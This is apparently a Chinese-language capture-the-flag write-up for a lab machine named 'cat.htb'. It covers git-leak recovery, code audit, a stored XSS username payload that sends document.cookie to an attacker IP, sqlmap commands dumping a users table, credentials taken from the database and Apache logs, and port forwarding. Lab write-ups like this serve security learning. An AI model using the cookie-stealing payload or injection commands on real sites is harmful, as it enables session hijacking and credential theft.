fscan

image-20250320142437964

dirsearch扫到git泄露

image-20250320134851916

githacker拉下来

image-20250320135711962

注册账号后发现这里可能有漏洞点

image-20250320140347556

审计代码 这里对出了照片的其他选项做了过滤,因此可以从照片入手

image-20250320140624125

貌似是对MIME头做了检验

image-20250320140836532

image-20250320140824376

下面还有一个白名单

image-20250320141415202

那好像不大好注了

看看别的

在view_cat看到打印了这么多内容

image-20250320142248699

其中这几个在前面看到是被waf过滤过的

image-20250320142242114

那么就可以从用户名入手

1
<img src=1 onerror=this.src="http://10.10.16.35:4444/?yiyi="+encodeURIComponent(document.cookie)>

注册登录后注册一只猫

得到审核人员的cookie

image-20250320144421526

替换cookie进入管理员面板

image-20250320144537274

继续审计accept_cat部分的代码,发现没有太多防护措施 且通过config可以看出是sqlite

image-20250320144734202

尝试sqlmap注入一下

1
2
python sqlmap.py -r C:\Users\31702\Desktop\tmp\req.txt --dbms=SQLite --tables --batch --level=5
python sqlmap.py -r C:\Users\31702\Desktop\tmp\req.txt --dbms=SQLite -T users --dump --batch --level=5

得到

1
2
rosamendoza485@gmail.com      ac369922d560f17d6eeb8b2c7dec498c
rosamendoza485@gmail.com      soyunaprincesarosa

image-20250320150202493

登录

image-20250320150336904

这里跟着wp学到思路了

查看apache日志 拿到axel的密码

1
2
cat /var/log/apache2/access.log | grep axel
aNdZwgC4tI9gnVXv_e3Q

image-20250320151014459

切换用户得到user.txt

开启了3000端口 将其穿出来

image-20250320151521335

1
2
gost -L=tcp://:3000/10.10.11.53:2222
./gost -L=tcp://:2222/127.0.0.1:3000

也可以用ssh转发

1
ssh  rosa@cat.htb -L 3000:127.0.0.1:3000

image-20250320152349390

后面把25端口也穿出来打CVE-2024-6886即可